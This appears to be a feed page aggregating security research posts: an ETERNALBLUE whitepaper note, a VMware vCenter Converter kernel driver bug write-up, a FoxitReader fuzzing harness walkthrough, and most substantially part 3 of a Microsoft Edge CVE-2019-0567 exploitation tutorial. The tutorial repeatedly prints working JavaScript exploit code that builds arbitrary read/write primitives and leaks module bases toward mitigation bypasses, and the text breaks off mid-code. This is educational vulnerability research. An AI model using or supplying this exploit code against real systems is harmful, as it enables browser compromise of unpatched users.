Reading view

There are new articles available, click to refresh the page.

ETERNALBLUE: Exploit Analysis and Port to Microsoft Windows 10

The whitepaper for the research done on ETERNALBLUE by @JennaMagius and I has been completed.

Be sure to check the bibliography for other great writeups of the pool grooming and overflow process. This paper breaks some new ground by explaining the execution chain after the memory corrupting overwrite is complete.

PDF Download

Errata

r5hjrtgher pointed out the vulnerable code section did not appear accurate. Upon further investigation, we discovered this was correct. The confusion was because unlike the version of Windows Server 2008 we originally reversed, on Windows 10 the Srv!SrvOs2FeaListSizeToNt function was inlined inside Srv!SrvOs2FeaListToNt. We saw a similar code path and hastily concluded it was the vulnerable one. Narrowing the exact location was not necessary to port the exploit.

Here is the correct vulnerable code path for Windows 10 version 1511:

How the vulnerability was patched with MS17-010:

The 16-bit registers were replaced with 32-bit versions, to prevent the mathematical miscalculation leading to buffer overflow.

Minor note: there was also extra assembly and mitigations added in the code paths leading to this.

To all the foreign intelligence agencies trying to spear phish I've already deleted all my data! :tinfoil:

Finding a Kernel 0-day in VMware vCenter Converter via Static Reverse Engineering

I posted a poll on twitter (Christopher on Twitter: "Next blog topic?" / Twitter) to decide on what this blog post would be about, and the results indicated it should be about Kernel driver reversing.

I figured I’d make it a bit more exciting by finding a new Kernel 0-day to integrate into the blog post, and so I started thinking what driver would be a fun target.
I’ve reversed VMware drivers before, primarily ones relating to their Hypervisor, but I’ve also used their vCenter Converter tool before and wondered what attack surface that introduces when installed.

Turns out it installs a Kernel component (vstor2-x64.sys) which is interactable via low-privileged users, we can see this driver installed with the name “vstor2-mntapi20-shared” in the “Driver” directory using Sysinternals’ WinObj.exe tool.

To confirm low-privileged users can interact with this driver, we take a look at the “Device” directory.
Drivers have various ways of communicating with user-land code, one common method is for the driver to expose a device that user-land code can open a handle to (using the CreateFile APIs), we find the device with the same name, double-click it and view its security attributes:

We see in the device security properties that the “everyone” group has read & write permissions, this means low-privileged users can obtain a handle to the device and use it to communicate to the driver.

Note that the driver and device names in these directories are set in the driver’s DriverEntry when it is loaded by Windows, first the device is created using IoCreateDevice, usually followed by a symbolic link creation using IoCreateSymbolicLink to give access to user-land code.

When a user-land process wants to communicate with a device driver, it will obtain a file handle to the device. In this case the code would look like:

#define USR_DEVICE_NAME L"\\\\.\\vstor2-mntapi20-shared"

HANDLE hDevice = CreateFileW(USR_DEVICE_NAME,

GENERIC_READ | GENERIC_WRITE,

FILE_SHARE_READ | FILE_SHARE_WRITE,

NULL,

OPEN_EXISTING,

0,

NULL);

This code results in the IRP_MJ_CREATE_HANDLER dispatch handler for the driver being called, this dispatch handler is part of the DRIVER_OBJECT for the target driver, which is the first argument to the driver’s DriverEntry, this structure has a MajorFunction array which can be set to function pointers that will handle callbacks for various events (like the create handler being called when a process opens a handle to the device driver)

In the image above we know the first argument to DriverEntry for any driver is a pointer to the DRIVER_OBJECT structure, with this information we can follow where this variable is used to find the code that sets the function pointers for the MajorFunction array.

We can find out which MajorFunction index maps to which IRP_MJ_xxx function by looking at sample code provided by Microsoft, specifically on line 284 here.

Since we now know which array index maps to which function, we rename the functions with meaningful names as shown in the image above (e.g. we name entry 0xe to ioctl_handler, as it handles DeviceIoControl messages from processes.

The read & write callbacks are called when a process calls ReadFile or WriteFile on the device handle, there are other callbacks too which we won’t go through.

To start with, lets analyze the irp_mj_create handler and see what happens when we create a handle to this device driver.

By default, this is what we see:

Firstly, we can improve decompilation by setting the correct types for a1 and a2, which we know must conform to the DRIVER_DISPATCH specification.

Doing so results in the following:

There’s a few things happening in this function, two important structures shown that are usually important are:

  • DeviceExtension object in the DEVICE_OBJECT structure

  • FsContext object in the IRP->CurrentStackLocation->FileObject structure

The DeviceExtension object is a pointer to a buffer created and managed by the driver object. It is accessible to the driver via the DEVICE_OBJECT structure (and thus accessible to the driver in all DRIVER_DISPATCH callbacks. Drivers typically create and use this buffer to manage state, variables & other information the driver wants to be able to access in a variety of locations (for example, if the driver supports various functions to Open, Read, Write or Close TCP connections via IOCTLs, the driver may store its current state (e.g. whether the connection is Open or Closed) in this DeviceExtension buffer, and whenever the Close function is called, it will check the state in the DeviceExtension buffer to ensure its in a state that can be closed), essentially its just a buffer that the driver uses to store/retrieve information from a variety of contexts/functions.

The FsContext structure is similar and can be used as an arbitrary buffer, the main difference is that the DEVICE_OBJECT structure is created by the driver during the IoCreateDevice call, which means the DeviceExtension buffer does not get torn down or re-created when a user process opens or closes a handle to the device, while the FsContext structure is associated with a FILE_OBJECT structure that is created when CreateFile is called, and destroyed when the handle is closed, meaning the FsContext buffer is per-handle.

From the decompiled code we see that a buffer of 0x20 size is allocated and set to be the FsContext structure, and we also see that the first 64bits of this structure is set to v5 in the code, which corresponds to the DeviceExtension pointer, meaning we already figured out that the FsContext struct contains a pointer to the DeviceExtension as its first element.

E.g.

struct FsContext {

PVOID pDevExt;

};

Figuring out the rest of the elements to the FsContext and DeviceExtension structures is a simple but sometimes tedious process of looking at all the DRIVER_DISPATCH functions for the driver (like the ioctl handler) and noting down what offsets are accessed in these structs and how they’re used (e.g. if offset 0x8 in the DeviceExtension is used in a KeAcquireSpinLockRaiseToDpc call, then we know that offset is a pointer to a KSPIN_LOCK object).

Taking the time to documents the structures this way pays off, it helps greatly when trying to understanding the decompilation, as with some effort we can transform the IRP_MJ_CREATE handler to look like the below:

When looking at the FsContext structure for example, we can open Ida’s Local Types window and create it using C syntax, which I created below:

Note that as you figure out what each element is, you can define the elements as random junk and rename/retype them as you go (so long as you know the size of the structure, which we get easily here via the 0x20 size argument to ExAllocatePoolWithTag).

Now that we’ve analyzed the IRP_MJ_CREATE handler and determined there’s nothing stopping us from creating a handle, we can look into how the driver handles Read, Write & DeviceIOControl requests from user processes.

In analyzing these handlers, we see heavy usage of the FsContext and DeviceExtension buffers, including checks on whether its contents are initialized.

Turns out, there are quite a few vulnerabilities in this driver that are reachable if you form your input correctly to hit their code paths, while I won’t go through all of them (some are still pending disclosure!), we will take a look at one which is a simple user->kernel DoS.

In IOCTL 0x2A0014 we see the DeviceExtension buffer get memset to 0 to clear its contents:

This is followed by a memmove that copies 0x100 bytes from the user’s input buffer to the DeviceExtension buffer, meaning those byte offsets we copy into are user controlled (I denote this with a _uc tag at the end of the variable name:

During this IOCTL, another field in the DeviceExtension also gets set (which seems to indicate that the DeviceExtension buffer has been initialized):

This is critical to triggering the bug (which we will see next).

So, the actual bug doesn’t live in the IOCTL handlers, instead it lives in the IRP_MJ_READ and IRP_MJ_WRITE handlers (note that in this case the READ and WRITE handlers are the same function, they just check the provided IRP to determine if the operation is a READ or WRITE).

In this handler, we can see a check to determine if the DeviceExtension’s some_if_field has been initialized:

After clearing this condition, the bug can be seen in sub_12840 in the following condition statement:

Here we see I denoted the unkn13 variable in the DeviceExtension buffer with _uc, this means its user controlled (in fact, its set during the memmove call we saw earlier).

From the decompilation we see that the code does a % operation on our user controllable value, this translates to a div instruction:

If you’re familiar with X86, you’ll know that a div instruction on the value 0 causes a divide-by-zero exception, we can easily trigger this here by provided an input buffer filled with 0 when we call the IOCTL 0x2A0014 to set the user controllable contents in the DeviceExtension buffer, then we can trigger this code by attempting to read/write the device handle using ReadFile or WriteFile APIs.

In fact there are multiple ways to trigger this, as the DeviceExtension buffer is essentially a global buffer, and no locking is used when reading this value, there exist race conditions where one thread is calling IOCTL 0x2A0014 and another is calling the read or write handler, such that this div instruction may be hit right after the memset operation in IOCTL 0x2A0014 clears the DeviceExtension buffer to 0.

In fact, there are multiple locations such race conditions would affect the code paths taken in this driver!

Overall, this driver is a good target for reverse engineering practice with Kernel drivers due to its use of not only IOCTLs, but also read & write handlers + the use of the FsContext and DeviceExtension buffers that need to be reversed to understand what the driver is doing, and how we can influence it. All the bugs found in this driver were purely from static reverse engineering as a fun exercise.

Interested in Reverse Engineering & Vulnerability Research Training?

We frequently run public sessions (or private sessions upon request) for trainings in Reverse Engineering & Vulnerability Research, see our Upcoming Trainings or Subscribe to get notified of our next public session dates.

Fuzzing FoxitReader 9.7’s ConvertToPDF

Inspiration to create a fuzzing harness for FoxitReader’s ConvertToPDF function (targeting version 9.7) came from discovering Richard Johnson’s fuzzer for a previous version of FoxitReader.

(found here: https://www.cnblogs.com/st404/p/9384704.html).

Multiple changes have since been introduced in the way FoxitReader converts an image to a PDF, including the introduction of new Vtables entries, the necessity to load in the main FoxitReader.exe binary (including fixing the IAT and modifying data sections to contain valid handles to the current process heap) + more.

The source for my version of the fuzzing harness targeting version 9.7 can be found on my GitHub: https://github.com/Kharos102/FoxitFuzz9.7

Below is a quick walkthrough of the reversing and coding performed to get this harness working.

Firstly — based on the existing work from the previous fuzzers available, we know that most of the calls for the conversion of an image to a PDF occur via vtable function calls from an object returned from ConvertToPDF_x86!CreateFXPDFConvertor, however this could also be found manually by debugging the application and adding a breakpoint on file read accesses to the image we supply as a parameter to the conversion function, and then walking the call stack.

To start our harness, I decided to analyse how the actual FoxitReader.exe process sets up objects required for the conversion function by setting a breakpoint for the CreateFXPDFConvertor function.

Next, by stepping out and setting a breakpoint on all the vtable function pointers for the returned object, we can discover what order these functions are called along with their parameters as this will be necessary for us to setup the object before calling the actual conversion routine.

Dumping the Object’s VTable

We know how to view the vtable as the pointer to the vtable is the first 4-bytes (32bit) when dumping the object.

During this process we can notice multiple differences compared to the older versions of FoxitReader, including changes to existing function prototypes and the introduction of new vtable functions that require to be called.

After executing and noting the details of execution, we hit the main conversion function from the vtable of our object, here we can analyse the main parameter (some sort of conversion buffer structure) by viewing its memory and noting its contents.

First we see the initial 4-bytes are a pointer to an offset within the FoxitReader.exe image

Buffer Structure Analysis

This means our harness will have to load the FoxitReader image in-memory to also supply a valid pointer (we also have to fix its IAT and modify the image too, as we discover after testing the harness).

Then we continue noting down the buffer’s contents, including the input file path at offset +0x1624, the output file path at offset +0x182c, and more (including a version string).

Finally after the conversion the object is released and the buffer is freed.

After noting all the above we can make a harness from the information discovered and test.

During testing, certain issues where discovered and accounted for, including exceptions in FoxitReader.exe that was loaded into memory, due to imports being used, this was fixed by fixing up the process IAT when loaded.

Additionally, calls to HeapAlloc were occurring where the heap handle was obtained via an offset in the FoxitReader image loaded in-memory, however it was uninitialised, this was fixed by writing the current process heap handle into the FoxitReader image at the offset HeapAlloc was expecting.

Overall the process was not long and the resulting harness allows for fuzzing of the ConvertToPDF functionality in-memory for FoxitReader 9.7.

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 3)

Introduction

In part one of this blog series on “modern” browser exploitation, targeting Windows, we took a look at how JavaScript manages objects in memory via the Chakra/ChakraCore JavaScript engine and saw how type confusion vulnerabilities arise. In part two we took a look at Chakra/ChakraCore exploit primitives and turning our type confusion proof-of-concept into a working exploit on ChakraCore, while dealing with ASLR, DEP, and CFG. In part three, this post, we will close out this series by making a few minor tweaks to our exploit primitives to go from ChakraCore to Chakra (the closed-source version of ChakraCore which Microsoft Edge runs on in various versions of Windows 10). After porting our exploit primitives to Edge, we will then gain full code execution while bypassing Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), and other minor mitigations in Edge, most notably “no child processes” in Edge. The final result will be a working exploit that can gain code execution with ASLR, DEP, CFG, ACG, CIG, and other mitigations enabled.

From ChakraCore to Chakra

Since we already have a working exploit for ChakraCore, we now need to port it to Edge. As we know, Chakra (Edge) is the “closed-source” variant of ChakraCore. There are not many differences between how our exploits will look (in terms of exploit primitives). The only thing we need to do is update a few of the offsets from our ChakraCore exploit to be compliant with the version of Edge we are exploiting. Again, as mentioned in part one, we will be using an UNPATCHED version of Windows 10 1703 (RS2). Below is an output of winver.exe, which shows the build number (15063.0) we are using. The version of Edge we are using has no patches and no service packs installed.

Moving on, below you can find the code that we will be using as a template for our exploitation. We will name this file exploit.html and save it to our Desktop (feel free to save it anywhere you would like).

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");
}
</script>

Nothing about this code differs in the slightest from our previous exploit.js code, except for the fact we are now using an HTML, as obviously this is the type of file Edge expects as it’s a web browser. This also means that we have replaced print() functions with proper document.write() HTML methods in order to print our exploit output to the screen. We have also added a <script></script> tag to allow us to execute our malicious JavaScript in the browser. Additionally, we added functionality in the <button onclick="main()">Click me to exploit CVE-2019-0567!</button> line, where our exploit won’t be executed as soon as the web page is opened. Instead, this button allows us choose when we want to detonate our exploit. This will aid us in debugging as we will see shortly.

Once we have saved exploit.html, we can double-click on it and select Microsoft Edge as the application we want to open it with. From there, we should be presented with our Click me to exploit CVE-2019-0567 button.

After we have loaded the web page, we can then click on the button to run the code presented above for exploit.html.

As we can see, everything works as expected (per our post number two in this blog series) and we leak the vftable from one of our DataView objects, from our exploit primitive, which is a pointer into chakra.dll. However, as we are exploiting Edge itself now and not the ChakraCore engine, computation of the base address of chakra.dll will be slightly different. To do this, we need to debug Microsoft Edge in order to compute the distance between our leaked address and chakra.dll’s base address. With that said, we will need to talk about debugging Edge in order to compute the base address of chakra.dll.

We will begin by making use of Process Hacker to aid in our debugging. After downloading Process Hacker, we can go ahead and start it.

After starting Process Hacker, let’s go ahead and re-open exploit.html but do not click on the Click me to exploit CVE-2019-0567 button yet.

Coming back to Process Hacker, we can see two MicrosoftEdgeCP.exe processes and a MicrosoftEdge.exe process.

Where do these various processes come from? As the CP in MicrosoftEdgeCP.exe infers, these are Microsoft Edge content processes. A content process, also known as a renderer process, is the actual component of the browser which executes the JavaScript, HTML, and CSS code a user interfaces with. In this case, we can see two MicrosoftEdgeCP.exe processes. One of these processes refers to the actual content we are seeing (the actual exploit.html web page). The other MicrosoftEdgeCP.exe process is technically not a content process, per se, and is actually the out-of-process JIT server which we talked about previously in this blog series. What does this actually mean?

JIT’d code is code that is generated as readable, writable, and executable (RWX). This is also known as “dynamic code” which is generated at runtime, and it doesn’t exist when the Microsoft Edge processes are spawned. We will talk about Arbitrary Code Guard (ACG) in a bit, but at a high level ACG prohibits any dynamic code (amongst other nuances we will speak of at the appropriate time) from being generated which is readable, writable, and executable (RWX). Since ACG is a mitigation, which was actually developed with browser exploitation and Edge in mind, there is a slight usability issue. Since JIT’d code is a massive component of a modern day browser, this automatically makes ACG incompatible with Edge. If ACG is enabled, then how can JIT’d code be generated, as it is RWX? The solution to this problem is by leveraging an out-of-process JIT server (located in the second MicrosoftEdgeCP.exe process).

This JIT server process has Arbitrary Code Guard disabled. The reason for this is because the JIT process doesn’t handle any execution of “untrusted” JavaScript code - meaning the JIT server can’t really be exploited by browser exploitation-related primitives, like a type confusion vulnerability (we will prove this assumption false with our ACG bypass). The reason is that since the JIT process doesn’t execute any of that JavaScript, HTML, or CSS code, meaning we can infer the JIT server doesn’t handled any “untrusted code”, a.k.a JavaScript provided by a given web page, we can infer that any code running within the JIT server is “trusted” code and therefore we don’t need to place “unnecessary constraints” on the process. With the out-of-process JIT server having no ACG-enablement, this means the JIT server process is now compatible with “JIT” and can generate the needed RWX code that JIT requires. The main issue, however, is how do we get this code (which is currently in a separate process) into the appropriate content process where it will actually be executed?

The way this works is that the out-of-process JIT server will actually take any JIT’d code that needs to be executed, and it will inject it into the content processes that contain the JavaScript code to be executed with proper permissions that are ACG complaint (generally readable/executable). So, at a high level, this out-of-process JIT server performs process injection to map the JIT’d code into the content processes (which has ACG enabled). This allows the Edge content processes, which are responsible for handling untrusted code like a web page that hosts malicious JavaScript to perform memory corruption (e.g. exploit.html), to have full ACG support.

Lastly, we have the MicrosoftEdge.exe process which is known as the browser process. It is the “main” process which helps to manage things like network requests and file access.

Armed with the above information, let’s now turn our attention back to Process Hacker.

The obvious point we can make is that when we do our exploit debugging, we know the content process is responsible for execution of the JavaScript code within our web page - meaning that it is the process we need to debug as it will be responsible for execution of our exploit. However, since the out-of-process JIT server is technically named as a content process, this makes for two instances of MicrosoftEdgeCP.exe. How do we know which is the out-of-process JIT server and which is the actual content process? This probably isn’t the best way to tell, but the way I figured this out with approximately 100% accuracy is by looking at the two content processes (MicrosoftEdgeCP.exe) and determining which one uses up more RAM. In my testing, the process which uses up more RAM is the target process for debugging (as it is significantly more, and makes sense as the content process has to load JavaScript, HTML, and CSS code into memory for execution). With that in mind, we can break down the process tree as such (based on the Process Hacker image above):

  1. MicrosoftEdge.exe - PID 3740 (browser process)
  2. MicrosoftEdgeCP.exe - PID 2668 (out-of-process JIT server)
  3. MicrosoftEdgeCP.exe - PID 2512 (content process - our “exploiting process” we want to debug).

With the aforementioned knowledge we can attach PID 2512 (our content process, which will likely differ on your machine) to WinDbg and know that this is the process responsible for execution of our JavaScript code. More importantly, this process loads the Chakra JavaScript engine DLL, chakra.dll.

After confirming chakra.dll is loaded into the process space, we then can click out Click me to exploit CVE-2019-0567 button (you may have to click it twice). This will run our exploit, and from here we can calculate the distance to chakra.dll in order to compute the base of chakra.dll.

As we can see above, the leaked vftable pointer is 0x5d0bf8 bytes away from chakra.dll. We can then update our exploit script to the following code, and confirm this to be the case.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");
}
</script>

After computing the base address of chakra.dll the next thing we need to do is, as shown in part two, leak an import address table (IAT) entry that points to kernel32.dll (in this case kernelbase.dll, which contains all of the functionality of kernel32.dll).

Using the same debugging session, or a new one if you prefer (following the aforementioned steps to locate the content process), we can locate the IAT for chakra.dll with the !dh command.

If we dive a bit deeper into the IAT, we can see there are several pointers to kernelbase.dll, which contains many of the important APIs such as VirtualProtect we need to bypass DEP and ACG. Specifically, for our exploit, we will go ahead and extract the pointer to kernelbase!DuplicateHandle as our kernelbase.dll leak, as we will need this API in the future for our ACG bypass.

What this means is that we can use our read primitive to read what chakra_base+0x5ee2b8 points to (which is a pointer into kernelbase.dll). We then can compute the base address of kernelbase.dll by subtracting the offset to DuplicateHandle from the base of kernelbase.dll in the debugger.

We now know that DuplicateHandle is 0x18de0 bytes away from kernelbase.dll’s base address. Armed with the following information, we can update exploit.html as follows and detonate it.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");
}
</script>

We are now almost done porting our exploit primitives to Edge from ChakraCore. As we can recall from our ChakraCore exploit, the last thing we need to do now is leak a stack address/the stack in order to bypass CFG for control-flow hijacking and code execution.

Recall that this information derives from this Google Project Zero issue. As we can recall with our ChakraCore exploit, we computed these offsets in WinDbg and determined that ChakraCore leveraged slightly different offsets. However, since we are now targeting Edge, we can update the offsets to those mentioned by Ivan Fratric in this issue.

However, even though the type->scriptContext->threadContext offsets will be the ones mentioned in the Project Zero issue, the stack address offset is slightly different. We will go ahead and debug this with alert() statements.

We know we have to leak a type pointer (which we already have stored in exploit.html the same way as part two of this blog series) in order to leak a stack address. Let’s update our exploit.html with a few items to aid in our debugging for leaking a stack address.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
